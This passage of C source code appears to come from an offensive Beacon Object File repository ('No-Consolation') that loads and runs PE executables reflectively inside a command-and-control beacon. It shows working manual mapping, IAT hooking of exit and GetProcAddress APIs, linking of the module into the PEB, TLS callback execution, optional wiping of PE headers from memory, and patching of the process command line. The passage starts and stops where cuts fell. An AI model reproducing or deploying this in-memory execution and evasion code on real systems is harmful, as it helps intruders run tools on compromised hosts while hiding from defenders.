         * 2) we start loading MPR.dll and realize it requires mprext.dll
         * 3) we then find the incomplete load of mprext.dll in memory and parse it
         *    in order to find the addresses of its exported functions
         * 4) we finish loading MPR.dll
         * 5) we finish loading mprext.dll
         */

        libs_loaded = BeaconGetValue(NC_LOADED_DLL_KEY);

        lib_loaded = (PLIB_LOADED)libs_loaded->list.Flink;
        while (&lib_loaded->list != &libs_loaded->list)
        {
            if (!_stricmp(lib_loaded->peinfo->pe_name, name))
            {
                // found it
                if (!lib_loaded->peinfo->pe_base && !lib_loaded->peinfo->custom_loaded)
                {
                    /*
                     * We loaded this DLL via LoadLibrary before and it returned 0x0.
                     * Simply return 0x0 as this DLL does not seem to exist
                     */

                    return NULL;
                }

                // return its base
                dll = lib_loaded->peinfo->pe_base;
                break;
            }

            lib_loaded = (PLIB_LOADED)lib_loaded->list.Flink;
        }
    }

    if (!dll && peinfo)
    {
        dep = intAlloc(sizeof(LOADED_PE_INFO));
        StringCopyA(dep->pe_name, name);
        CharStringToWCharString(dep->pe_wname, name, MAX_PATH);
        dep->link_to_peb   = peinfo->link_to_peb;
        dep->dont_unload   = peinfo->dont_unload;
        dep->is_dependency = TRUE;
        dep->load_all_deps = peinfo->load_all_deps;
        dep->load_all_deps_but = peinfo->load_all_deps_but;
        dep->load_deps     = peinfo->load_deps;
        dep->search_paths  = peinfo->search_paths;

        store_loaded_dll(dep, dll, name);
    }

    // if not already loaded, custom load it if the operator so chooses
    if (!dll && peinfo &&
        (peinfo->load_all_deps ||
        (peinfo->load_all_deps_but && !string_is_included(peinfo->load_all_deps_but, name)) ||
        (peinfo->load_deps && string_is_included(peinfo->load_deps, name))))
    {

        DPRINT("%s depends on %s, custom loading...", peinfo->pe_name, name);
        if (load_dependency(dep, name))
        {
            DPRINT("Finished loading %s, continuing with %s", name, peinfo->pe_name);
            dep->custom_loaded = TRUE;
            dll = dep->pe_base;
        }
        else
        {
            PRINT_ERR("Failed to custom load %s", name);
        }
    }

    // fallback to LoadLibrary
    if (!dll)
    {
        dll = LoadLibraryA(name);
        if (peinfo)
        {
            DPRINT("Loaded %s via LoadLibrary at 0x%p, continuing with %s", name, dll, peinfo->pe_name);
        }
        else
        {
            DPRINT("Loaded %s via LoadLibrary at 0x%p", name, dll);
        }
        if (dep)
        {
            dep->custom_loaded = FALSE;
            dep->pe_base       = dll;
        }
    }

    if (api_set_ok)
    {
        memset(name, 0, MAX_PATH);
        intFree(name);
    }

    return dll;
}

PVOID handle_import(
    IN PLOADED_PE_INFO peinfo,
    IN PVOID dll_base,
    IN LPSTR dll_name,
    IN LPSTR api_name)
{
    PVOID address = NULL;

    /*
     * Here we implement our IAT hooking.
     * If the PE was run with --dont-unload, we don't redirect imports
     * to this BOF, as this will be offloaded soon.
     */

    // if this is an exit-related API, replace it with RtlExitUserThread
    if (IsExitAPI(api_name))
    {
        DPRINT("IAT hooking %s!%s with rtl_exit_user_thread", dll_name ? dll_name : "?", api_name);
        address = rtl_exit_user_thread;
    }
    // some PEs search for exit-related APIs using GetProcAddress
    else if (peinfo && !peinfo->dont_unload && !peinfo->is_dependency && !_stricmp(api_name, "GetProcAddress"))
    {
        DPRINT("IAT hooking %s!%s with my_get_proc_address", dll_name ? dll_name : "?", api_name);
        address = my_get_proc_address;
    }
    // PEs call GetModuleHandleW(NULL), we ensure this returns their base address
    else if (peinfo && !peinfo->dont_unload && !peinfo->is_dependency && !_stricmp(api_name, "GetModuleHandleW"))
    {
        DPRINT("IAT hooking %s!%s with my_get_module_handle_w", dll_name ? dll_name : "?", api_name);
        address = my_get_module_handle_w;
    }
    // resolve the API without IAT hook
    else
    {
        address = xGetProcAddress(dll_base, api_name, 0);
    }

    if (!address)
    {
        DPRINT_ERR("Failed get address of %s!%s", dll_name ? dll_name : "?", api_name);
    }

    return address;
}

BOOL load_pe(
    IN PVOID pedata,
    IN UINT32 pelen,
    IN OUT PLOADED_PE_INFO peinfo)
{
    PIMAGE_DOS_HEADER           dos         = NULL;
    PIMAGE_NT_HEADERS           nt          = NULL;
    PIMAGE_NT_HEADERS           ntnew       = NULL;
    PIMAGE_SECTION_HEADER       sh          = NULL;
    PIMAGE_THUNK_DATA           oft         = NULL;
    PIMAGE_THUNK_DATA           ft          = NULL;
    PIMAGE_IMPORT_BY_NAME       ibn         = NULL;
    PIMAGE_IMPORT_DESCRIPTOR    imp         = NULL;
    PIMAGE_DELAYLOAD_DESCRIPTOR del         = NULL;
    PIMAGE_EXPORT_DIRECTORY     exp         = NULL;
    PIMAGE_TLS_DIRECTORY        tls         = NULL;
    PIMAGE_TLS_CALLBACK         *callbacks  = NULL;
    PIMAGE_RELOC                list        = NULL;
    PIMAGE_BASE_RELOCATION      ibr         = NULL;
#ifdef _WIN64
    PRUNTIME_FUNCTION           func_table  = NULL;
#endif
    DWORD                       rva         = 0;
    DWORD                       size        = 0;
    PDWORD                      adr         = NULL;
    PDWORD                      sym         = NULL;
    PWORD                       ord         = NULL;
    PBYTE                       ofs         = NULL;
    PCHAR                       str         = NULL;
    PCHAR                       name        = NULL;
    HMODULE                     dll         = NULL;
    LPVOID                      base        = NULL;
    DWORD                       i           = 0;
    DWORD                       cnt         = 0;
    PVOID                       baseAddress = NULL;
    SIZE_T                      numBytes    = 0;
    DWORD                       newprot     = 0;
    DWORD                       oldprot     = 0;
    NTSTATUS                    status      = STATUS_UNSUCCESSFUL;
    PVOID                       pe_base     = NULL;
    SIZE_T                      pe_size     = 0;
    BOOL                        has_reloc   = FALSE;
    DllMain_t                   DllMain     = NULL;
    FP                          fp          = { 0 };

    if (!is_pe(pedata))
    {
        DPRINT_ERR("The data is not a PE");
        goto Cleanup;
    }

    peinfo->is_dll = is_dll(pedata);

    base = pedata;
    dos  = (PIMAGE_DOS_HEADER)base;
    nt   = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);

    if (nt->FileHeader.Machine != MACHINE)
    {
        PRINT_ERR("Host process and PE are not compatible");
        goto Cleanup;
    }

    // check if the binary has relocation information
    size = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
    has_reloc = size == 0 ? FALSE : TRUE;
    if (!has_reloc)
    {
        pe_base = (PVOID)nt->OptionalHeader.ImageBase;
        DPRINT("No relocation information present, setting the base to: 0x%p", pe_base);
    }

    pe_size = nt->OptionalHeader.SizeOfImage;
    status = NtAllocateVirtualMemory(NtCurrentProcess(), &pe_base, 0, &pe_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!NT_SUCCESS(status))
    {
        pe_base = NULL;
        syscall_failed("NtAllocateVirtualMemory", status);
        PRINT_ERR("Failed to allocate PE, address 0x%p seems to be in use", pe_base);
        goto Cleanup;
    }

    DPRINT("Mapped at 0x%p - 0x%p", pe_base, RVA2VA(PVOID, pe_base, pe_size));

    DPRINT("Copying Headers");
    memcpy(pe_base, base, nt->OptionalHeader.SizeOfHeaders);

    ntnew = RVA2VA(PIMAGE_NT_HEADERS, pe_base, dos->e_lfanew);
    ntnew->OptionalHeader.ImageBase = (ULONG_PTR)pe_base;

    DPRINT("Copying each section to memory");
    sh = IMAGE_FIRST_SECTION(ntnew);

    for (i = 0; i < ntnew->FileHeader.NumberOfSections; i++)
    {
        PBYTE dest = (PBYTE)pe_base + sh[i].VirtualAddress;
        PBYTE source = (PBYTE)base + sh[i].PointerToRawData;

        // Copy the section data
        memcpy(dest,
            source,
            sh[i].SizeOfRawData);

        DPRINT("Copied %s at 0x%p", sh[i].Name, dest);
    }

    peinfo->pe_base = pe_base;
    peinfo->pe_size = pe_size;

    ofs  = (PBYTE)pe_base - nt->OptionalHeader.ImageBase;

    if (has_reloc && ofs != 0)
    {
        DPRINT("Applying Relocations");

        rva  = ntnew->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
        ibr = RVA2VA(PIMAGE_BASE_RELOCATION, pe_base, rva);

        while ((PBYTE)ibr < ((PBYTE)pe_base + rva + size) && ibr->SizeOfBlock != 0)
        {
            list = (PIMAGE_RELOC)(ibr + 1);

            while ((PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock)
            {
                // check that the RVA is within the boundaries of the PE
                if (ibr->VirtualAddress + list->offset < ntnew->OptionalHeader.SizeOfImage)
                {
                    PULONG_PTR address = (PULONG_PTR)((PBYTE)pe_base + ibr->VirtualAddress + list->offset);
                    if (list->type == IMAGE_REL_BASED_DIR64) {
                        *address += (ULONG_PTR)ofs;
                    } else if (list->type == IMAGE_REL_BASED_HIGHLOW) {
                        *address += (DWORD)(ULONG_PTR)ofs;
                    } else if (list->type == IMAGE_REL_BASED_HIGH) {
                        *address += HIWORD(ofs);
                    } else if (list->type == IMAGE_REL_BASED_LOW) {
                        *address += LOWORD(ofs);
                    } else if (list->type != IMAGE_REL_BASED_ABSOLUTE) {
                        DPRINT_ERR("ERROR: Unrecognized Relocation type %08lx.", list->type);
                        goto Cleanup;
                    }
                }
                list++;
            }
            ibr = (PIMAGE_BASE_RELOCATION)list;
        }
    }

#ifdef _WIN64
    rva  = ntnew->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION].VirtualAddress;

    if (rva != 0)
    {
        /*
         * In this section, we try to add support for C++ Exceptions.
         * To achieve this, we update the inverted function table
         * given that this memory structure is (for some reason) important
         * while dealing with exceptions.
         */

        func_table = RVA2VA(PRUNTIME_FUNCTION, pe_base, rva);
        size = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION].Size;

        // most PE loaders do this but I haven't found it useful
        //RtlAddFunctionTable(func_table, size / sizeof(RUNTIME_FUNCTION), pe_base);

        if (!insert_inverted_function_table_entry(pe_base, pe_size, func_table, size))
        {
            DPRINT("Failed to insert new entry in the inverted function table");
            goto Cleanup;
        }

        // remember the function table so we can cleanup later
        peinfo->func_table = func_table;
    }
#endif

    rva = ntnew->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;

    if (rva != 0)
    {
        DPRINT("Processing the Import Table");

        imp = RVA2VA(PIMAGE_IMPORT_DESCRIPTOR, pe_base, rva);

        // For each DLL
        for (; imp->Name != 0; imp++)
        {
            name = RVA2VA(PCHAR, pe_base, imp->Name);

            dll = handle_dependency(peinfo, name);
            if (!dll)
            {
                DPRINT_ERR("Failed to load %s", name);
                goto Cleanup;
            }

            // remember if msvcrt gets loaded
            if (!_stricmp(name, "msvcrt.dll"))
                peinfo->loaded_msvcrt   = TRUE;
            // remember if mscoree gets loaded
            if (!_stricmp(name, "mscoree.dll"))
                peinfo->loaded_mscoree  = TRUE;
            // remember if ucrtbase gets loaded
            if (!_stricmp(name, "ucrtbase.dll") || !strncmp(name, "api-ms-win-crt", 14))
                peinfo->loaded_ucrtbase = TRUE;

            // Resolve the API for this library
            oft = RVA2VA(PIMAGE_THUNK_DATA, pe_base, imp->OriginalFirstThunk);
            ft  = RVA2VA(PIMAGE_THUNK_DATA, pe_base, imp->FirstThunk);

            // For each API
            for (;; oft++, ft++)
            {
                // No API left?
                if (oft->u1.AddressOfData == 0) break;

                // Resolve by ordinal?
                if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal))
                {
                    ft->u1.Function = (ULONG_PTR)xGetProcAddress(dll, NULL, oft->u1.Ordinal);
                    if (!ft->u1.Function)
                    {
                        DPRINT_ERR("Failed get address of ordinal %d from %s", oft->u1.Ordinal, name);
                        goto Cleanup;
                    }
                }
                else
                {
                    // Resolve by name
                    ibn = RVA2VA(PIMAGE_IMPORT_BY_NAME, pe_base, oft->u1.AddressOfData);
                    ft->u1.Function = (ULONG_PTR)handle_import(peinfo, dll, name, ibn->Name);

                    if (!ft->u1.Function)
                        goto Cleanup;
                }
            }
        }
    }

    rva = ntnew->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].VirtualAddress;

    if (rva != 0)
    {
        DPRINT("Processing Delayed Import Table");

        del = RVA2VA(PIMAGE_DELAYLOAD_DESCRIPTOR, pe_base, rva);

        // For each DLL
        for (; del->DllNameRVA != 0; del++)
        {
            name = RVA2VA(PCHAR, pe_base, del->DllNameRVA);

            dll = handle_dependency(peinfo, name);
            if (dll == NULL) continue;

            // Resolve the API for this library
            oft = RVA2VA(PIMAGE_THUNK_DATA, pe_base, del->ImportNameTableRVA);
            ft  = RVA2VA(PIMAGE_THUNK_DATA, pe_base, del->ImportAddressTableRVA);

            // For each API
            for (;; oft++, ft++)
            {
                // No API left?
                if (oft->u1.AddressOfData == 0) break;

                if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal))
                {
                    // Resolve by ordinal
                    ft->u1.Function = (ULONG_PTR)xGetProcAddress(dll, NULL, oft->u1.Ordinal);
                }
                else
                {
                    // Resolve by name
                    ibn = RVA2VA(PIMAGE_IMPORT_BY_NAME, pe_base, oft->u1.AddressOfData);
                    ft->u1.Function = (ULONG_PTR)handle_import(peinfo, dll, name, ibn->Name);
                }
            }
        }
    }

    DPRINT("Setting permissions for each PE section");
    for (i = 0; i < nt->FileHeader.NumberOfSections; i++)
    {
        if (sh[i].Characteristics & IMAGE_SCN_MEM_WRITE)
            newprot = PAGE_WRITECOPY;

        if (sh[i].Characteristics & IMAGE_SCN_MEM_READ)
            newprot = PAGE_READONLY;

        if ((sh[i].Characteristics & IMAGE_SCN_MEM_WRITE) && (sh[i].Characteristics & IMAGE_SCN_MEM_READ))
            newprot = PAGE_READWRITE;

        if (sh[i].Characteristics & IMAGE_SCN_MEM_EXECUTE)
            newprot = PAGE_EXECUTE;

        if ((sh[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) && (sh[i].Characteristics & IMAGE_SCN_MEM_WRITE))
            newprot = PAGE_EXECUTE_WRITECOPY;

        if ((sh[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) && (sh[i].Characteristics & IMAGE_SCN_MEM_READ))
            newprot = PAGE_EXECUTE_READ;

        if ((sh[i].Characteristics & IMAGE_SCN_MEM_EXECUTE ) && ( sh[i].Characteristics & IMAGE_SCN_MEM_WRITE ) && ( sh[i].Characteristics & IMAGE_SCN_MEM_READ ) )
            newprot = PAGE_EXECUTE_READWRITE;

        baseAddress = RVA2VA(PVOID, pe_base, sh[i].VirtualAddress);
        numBytes    = sh[i].SizeOfRawData;

        DPRINT("Section name: %s, size, 0x%llX, protections: 0x%X", sh[i].Name, numBytes, newprot);

        if (!numBytes)
            continue;

        status = NtProtectVirtualMemory(NtCurrentProcess(), &baseAddress, &numBytes, newprot, &oldprot);
        if (!NT_SUCCESS(status))
        {
            syscall_failed("NtProtectVirtualMemory", status);
            goto Cleanup;
        }
    }

    if (peinfo->headers)
    {
        DPRINT("Wiping Headers from memory");
        memset(pe_base, 0, nt->OptionalHeader.SizeOfHeaders);
    }

    // declare variables and set permissions of module header
    DPRINT("Setting permissions of module headers to READONLY (%d bytes)", nt->OptionalHeader.BaseOfCode);
    oldprot = 0;

    baseAddress = pe_base;
    numBytes    = nt->OptionalHeader.BaseOfCode;
    status = NtProtectVirtualMemory(NtCurrentProcess(), &baseAddress, &numBytes, PAGE_READONLY, &oldprot);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtProtectVirtualMemory", status);
        goto Cleanup;
    }

    DPRINT("Flushing instructionCache");
    status = NtFlushInstructionCache(NtCurrentProcess(), NULL, 0);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtFlushInstructionCache", status);
        goto Cleanup;
    }

    // find the entry point of the PE
    if (peinfo->is_dll)
    {
        // some DLLs don't have an entry point
        if (nt->OptionalHeader.AddressOfEntryPoint)
            peinfo->DllMain = RVA2VA(PVOID, pe_base, nt->OptionalHeader.AddressOfEntryPoint);
        else
            peinfo->DllMain = NULL;

        if (peinfo->method)
        {
            DPRINT("Resolving address of %s", peinfo->method);

            rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
            exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, pe_base, rva);

            if (rva != 0)
            {
                cnt = exp->NumberOfNames;

                if (cnt != 0)
                {
                    adr = RVA2VA(PDWORD,pe_base, exp->AddressOfFunctions);
                    sym = RVA2VA(PDWORD,pe_base, exp->AddressOfNames);
                    ord = RVA2VA(PWORD, pe_base, exp->AddressOfNameOrdinals);

                    do {
                        str = RVA2VA(PCHAR, pe_base, sym[cnt-1]);
                        if (!_stricmp(str, peinfo->method))
                        {
                            peinfo->DllParam = RVA2VA(PVOID, pe_base, adr[ord[cnt-1]]);
                            break;
                        }
                    } while (--cnt);

                    if (!peinfo->DllParam)
                    {
                        DPRINT_ERR("Unable to resolve %s", peinfo->method);
                        goto Cleanup;
                    }
                }
            }
        }
    }
    else
    {
        peinfo->EntryPoint = RVA2VA(PVOID, pe_base, nt->OptionalHeader.AddressOfEntryPoint);
    }

    if (peinfo->link_to_peb)
    {
        DPRINT("Linking module to the PEB");

        if (!link_module(peinfo, pe_base))
        {
            DPRINT("Failed to link module to the PEB");
            goto Cleanup;
        }
        peinfo->linked = TRUE;
    }

    if (peinfo->ldr_entry)
    {
        DPRINT("Processing Thread Local Storage");

        fp.ptr = find_ldrp_handle_tls_data();;
        if (fp.ptr)
        {
            status = fp.thiscall(peinfo->ldr_entry);
            if (!NT_SUCCESS(status))
            {
                syscall_failed("LdrpHandleTlsData", status);
                goto Cleanup;
            }

            peinfo->handled_tls = TRUE;
        }
    }

    // Execute TLS callbacks
    rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].VirtualAddress;
    if (rva != 0)
    {
        DPRINT("Processing TLS directory");

        tls = RVA2VA(PIMAGE_TLS_DIRECTORY, pe_base, rva);

        // address of callbacks is absolute. requires relocation information
        callbacks = (PIMAGE_TLS_CALLBACK*)tls->AddressOfCallBacks;
        DPRINT("AddressOfCallBacks : %p", callbacks);

        if (callbacks)
        {
            while (*callbacks != NULL)
            {
                /*
                 * while TLS callbacks are called by this thread (meaning, no hwbp)
                 * this in unlikely to be an issue given that they are
                 * usually created by the compiler and should be harmless
                 */
                DPRINT("Calling %p", *callbacks);
                (*callbacks)((LPVOID)pe_base, DLL_PROCESS_ATTACH, NULL);
                callbacks++;
            }
        }
    }

    // call DllMain if apropiate
    if (peinfo->is_dll && (peinfo->is_dependency || peinfo->method) && peinfo->DllMain)
    {
        DPRINT("Executing DllMain(hinstDLL, DLL_PROCESS_ATTACH, NULL)");

        DllMain = peinfo->DllMain;
        DllMain(peinfo->pe_base, DLL_PROCESS_ATTACH, NULL);
    }

    if (!peinfo->is_dependency && !SetCommandLineW(peinfo->cmdwline))
    {
        goto Cleanup;
    }

    if (peinfo->dont_unload)
    {
        store_loaded_dll(peinfo, peinfo->pe_base, peinfo->pe_name);
    }

    peinfo->loaded = TRUE;

    return TRUE;

Cleanup:

    // TODO: cleanup?
    return FALSE;
}

// check each exit-related api with name provided
BOOL IsExitAPI(
    IN PCHAR name)
{
    PCHAR str = "ExitProcess;exit;_exit;_cexit;_c_exit;quick_exit;_Exit;_o_exit;CorExitProcess\0";
    return string_is_included(str, name);
}

// returns TRUE if ptr is heap memory
BOOL IsHeapPtr(
    IN LPVOID ptr)
{
    NTSTATUS                 status = STATUS_UNSUCCESSFUL;
    MEMORY_BASIC_INFORMATION mbi    = { 0 };
    MEMORY_INFORMATION_CLASS mic    = 0;

    if (ptr == NULL) return FALSE;

    // query the pointer
    status = NtQueryVirtualMemory(NtCurrentProcess(), ptr, mic, &mbi, sizeof(mbi), NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtQueryVirtualMemory", status);
        return FALSE;
    }

    return (mbi.State   == MEM_COMMIT  &&
            mbi.Type    == MEM_PRIVATE &&
            mbi.Protect == PAGE_READWRITE);
}


// check if memory address can be read
BOOL IsReadable(
    IN LPVOID ptr)
{
    NTSTATUS                 status = STATUS_UNSUCCESSFUL;
    MEMORY_BASIC_INFORMATION mbi    = { 0 };
    MEMORY_INFORMATION_CLASS mic    = 0;

    if (ptr == NULL) return FALSE;

    // query the pointer
    status = NtQueryVirtualMemory(NtCurrentProcess(), ptr, mic, &mbi, sizeof(mbi), NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtQueryVirtualMemory", status);
        return FALSE;
    }

    return (mbi.Protect == PAGE_READWRITE    ||
            mbi.Protect == PAGE_READONLY     ||
            mbi.Protect == PAGE_EXECUTE_READ ||
            mbi.Protect == PAGE_EXECUTE_READWRITE);
}

/*
 * Set the command line for host process.
 * This replaces kernelbase!BaseUnicodeCommandLine and kernelbase!BaseAnsiCommandLine
 * that kernelbase!KernelBaseDllInitialize reads from NtCurrentPeb()->ProcessParameters->CommandLine
 */
BOOL SetCommandLineW(
    IN PCWSTR CommandLine)
{
    PIMAGE_DOS_HEADER      dos      = NULL;
    PIMAGE_NT_HEADERS      nt       = NULL;
    PIMAGE_SECTION_HEADER  sh       = NULL;
    DWORD                  i        = 0;
    DWORD                  cnt      = 0;
    PULONG_PTR             ds       = NULL;
    HMODULE                m        = NULL;
    ANSI_STRING            ansi     = { 0 };
    PANSI_STRING           mbs      = NULL;
    PUNICODE_STRING        wcs      = NULL;
    PPEB2                  peb      = NULL;
    PPEB_LDR_DATA2         ldr      = NULL;
    PLDR_DATA_TABLE_ENTRY2 dte      = NULL;
    CHAR                   **argv   = NULL;
    WCHAR                  **wargv  = NULL;
    p_acmdln_t             p_acmdln = NULL;
    p_wcmdln_t             p_wcmdln = NULL;
    CHAR                   sym[128] = { 0 };
    PCHAR                  str      = NULL;
    INT                    fptr     = 0;
    INT                    atype    = 0;
    PVOID                  addr     = NULL;
    PVOID                  wcmd     = NULL;
    PVOID                  acmd     = NULL;

    if (!CommandLine)
        return TRUE;

    peb = (PPEB2)READ_MEMLOC(PEB_OFFSET);
    ldr = (PPEB_LDR_DATA2)peb->Ldr;

    m   = xGetLibAddress("KernelBase", TRUE, NULL);
    dos = (PIMAGE_DOS_HEADER)m;
    nt  = RVA2VA(PIMAGE_NT_HEADERS, m, dos->e_lfanew);
    sh  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader +
          nt->FileHeader.SizeOfOptionalHeader);

    // locate the .data segment, save VA and number of pointers
    for (i = 0; i < nt->FileHeader.NumberOfSections; i++)
    {
        if (*(PDWORD)sh[i].Name == *(PDWORD)".data")
        {
            ds  = RVA2VA(PULONG_PTR, m, sh[i].VirtualAddress);
            cnt = sh[i].Misc.VirtualSize / sizeof(ULONG_PTR);
            break;
        }
    }

    DPRINT("Searching %i pointers", cnt);

    wcmd = GetCommandLineW();

    for (i = 0; i < cnt; i++)
    {
        wcs = (PUNICODE_STRING)&ds[i];
        // skip if not equal
        if (wcs->Buffer != wcmd) continue;
        DPRINT("BaseUnicodeCommandLine found at %p:%p : %ls", &ds[i], wcs->Buffer, wcs->Buffer);
        // overwrite buffer for GetCommandLineW
        RtlCreateUnicodeString(wcs, CommandLine);
        DPRINT("GetCommandLineW() : %ls", GetCommandLineW());
        break;
    }

    acmd = GetCommandLineA();

    for (i = 0; i < cnt; i++)
    {
        mbs = (PANSI_STRING)&ds[i];
        // skip if not equal
        if (mbs->Buffer != acmd) continue;
        DPRINT("BaseAnsiCommandLine found at %p:%p : %s", &ds[i], mbs->Buffer, mbs->Buffer);
        RtlUnicodeStringToAnsiString(&ansi, wcs, TRUE);
        memcpy(&ds[i], &ansi, sizeof(ANSI_STRING));
        DPRINT("GetCommandLineA() : %s", GetCommandLineA());
        break;
    }

    // for each DLL loaded
    for (dte=(PLDR_DATA_TABLE_ENTRY2)ldr->InLoadOrderModuleList.Flink;
         dte->DllBase != NULL;
         dte=(PLDR_DATA_TABLE_ENTRY2)dte->InLoadOrderLinks.Flink)
    {
        // check for exported symbols and patch according to string type
        str = (PCHAR)"_acmdln;__argv;__p__acmdln;__p___argv;_wcmdln;__wargv;__p__wcmdln;__p___wargv\0";

        for (;;)
        {
            // reset flags
            atype = 1; fptr = 0;
            // store string until null byte or semi-colon encountered
            for (i = 0; str[i] != '\0' && str[i] != ';' && i < 128; i++)
            {
                // w indicates unicode type
                if (str[i] == 'w') atype = 0;
                // p indicates function pointer
                if (str[i] == 'p') fptr  = 1;
                // store byte
                sym[i] = str[i];
            }
            // nothing stored? end loop for this DLL
            if (i == 0) break;
            // skip name plus one for separator
            str += (i + 1);
            // store null terminator
            sym[i] = '\0';
            // see if it can be resolved for current module
            addr = xGetProcAddress(dte->DllBase, sym, 0);
            // nothing resolve? get the next symbol from list
            if (addr == NULL) continue;
            // is this ansi?
            if (atype)
            {
                argv = (PCHAR*)addr;
                // pointer?
                if (fptr != 0)
                {
                    p_acmdln = (p_acmdln_t)addr;
                    argv = p_acmdln();
                }
                // anything to patch?
                DPRINT("Checking %s", sym);
                if (IsReadable(argv) && IsHeapPtr(*argv))
                {
                    DPRINT("Setting %ls!%s \"%s\" to \"%s\"", dte->BaseDllName.Buffer, sym, *argv, ansi.Buffer);
                    *argv = ansi.Buffer;
                }
            }
            else
            {
                wargv = (PWCHAR*)addr;
                // pointer?
                if (fptr != 0)
                {
                    p_wcmdln = (p_wcmdln_t)addr;
                    wargv = p_wcmdln();
                }
                // anything to patch?
                DPRINT("Checking %s", sym);
                if (IsReadable(wargv) && IsHeapPtr(*wargv))
                {
                    DPRINT("Setting %ls!%s \"%ls\" to \"%ls\"", dte->BaseDllName.Buffer, sym, *wargv, wcs->Buffer);
                    *wargv = wcs->Buffer;
                }
            }
        }
    }

    return TRUE;
}


================================================
FILE: Execution-BOF/No-Consolation/source/peb.c
================================================

#include "peb.h"
#include "loader.h"

// find a DLL with a certain export, used by xGetProcAddress and FindExport
LPVOID find_reference(
    IN LPVOID original_dll,
    IN PCHAR dll_name,
    IN PCHAR api_name)
{
    PPEB2                  peb  = NULL;
    PPEB_LDR_DATA2         ldr  = NULL;
    PLDR_DATA_TABLE_ENTRY2 dte  = NULL;
    LPVOID                 addr = NULL;
    LPVOID                 base = NULL;

    peb = (PPEB2)READ_MEMLOC(PEB_OFFSET);
    ldr = (PPEB_LDR_DATA2)peb->Ldr;

    // for each DLL loaded
    for (dte=(PLDR_DATA_TABLE_ENTRY2)ldr->InLoadOrderModuleList.Flink;
         dte->DllBase != NULL && addr == NULL;
         dte=(PLDR_DATA_TABLE_ENTRY2)dte->InLoadOrderLinks.Flink)
    {
        base = dte->DllBase;
        // if this is the dll with the reference, continue
        if (base == original_dll) continue;

        addr = xGetProcAddress(base, api_name, 0);
    }
    if (addr == NULL)
    {
        // we did not find the reference, use LoadLibrary
        DPRINT("Could not find %s, using LoadLibraryA", dll_name);
        HMODULE hModule = LoadLibraryA(dll_name);
        if (hModule != NULL)
        {
            DPRINT("Calling GetProcAddress(%s, %s)", dll_name, api_name);
            addr = GetProcAddress(hModule, api_name);
        }
    }

    return addr;
}

// search for an export in a DLL
LPVOID xGetProcAddress(
    IN LPVOID base,
    IN PCHAR api_name,
    IN DWORD ordinal)
{
    PIMAGE_DOS_HEADER       dos           = NULL;
    PIMAGE_NT_HEADERS       nt            = NULL;
    PIMAGE_DATA_DIRECTORY   dir           = NULL;
    PIMAGE_EXPORT_DIRECTORY exp           = NULL;
    LPVOID                  addr          = NULL;
    DWORD                   rva           = 0;
    DWORD                   cnt           = 0;
    PDWORD                  adr           = NULL;
    PDWORD                  sym           = NULL;
    PWORD                   ord           = NULL;
    PCHAR                   api           = NULL;
    CHAR                    dll_name[256] = { 0 };
    CHAR                    new_api[256]  = { 0 };
    DWORD                   i             = 0;
    PCHAR                   p             = NULL;
    DWORD                   len           = 0;
    PVOID                   newbase       = NULL;

    if (base == NULL) return NULL;

    dos = (PIMAGE_DOS_HEADER)base;
    nt  = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
    dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
    rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;

    // if no export table, return NULL
    if (rva == 0) return NULL;

    exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, base, rva);
    adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions);
    sym = RVA2VA(PDWORD,base, exp->AddressOfNames);
    ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals);

    if (api_name != NULL)
    {
        // exported by name
        cnt = exp->NumberOfNames;
        // if no api names, return NULL
        if (cnt == 0) return NULL;

        do {
            api = RVA2VA(PCHAR, base, sym[cnt-1]);
            // check if the export name matches the API we are looking for
            if (!_stricmp(api, api_name))
            {
                // get the address of the API
                addr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]);
            }
        } while (--cnt && addr == NULL);
    }
    else
    {
        // exported by ordinal
        addr = RVA2VA(PVOID, base, adr[ordinal - exp->Base]);
    }

      // is this a forward reference?
    if ((PBYTE)addr >= (PBYTE)exp &&
      (PBYTE)addr <  (PBYTE)exp +
      dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
    {
        //DPRINT("%s is forwarded to %s", api_name, (char*)addr);

        // copy DLL name to buffer
        p=(char*)addr;
        len=StringLengthA(p);

        for (i=0; p[i] != 0 && i < sizeof(dll_name) - 4; i++)
        {
            dll_name[i] = p[i];
        }

        for (i=len-1; i > 0; i--)
        {
            if(p[i] == '.') break;
        }

        dll_name[i+1] = 'd';
        dll_name[i+2] = 'l';
        dll_name[i+3] = 'l';
        dll_name[i+4] = 0;

        p += i + 1;

        // copy API name to buffer
        for(i = 0; p[i] != 0 && i < sizeof(new_api) - 1; i++)
        {
            new_api[i] = p[i];
        }
        new_api[i] = 0;

        newbase = handle_dependency(NULL, dll_name);
        if (base == newbase)
        {
            /*
             * the api set seems to resolve to itself...
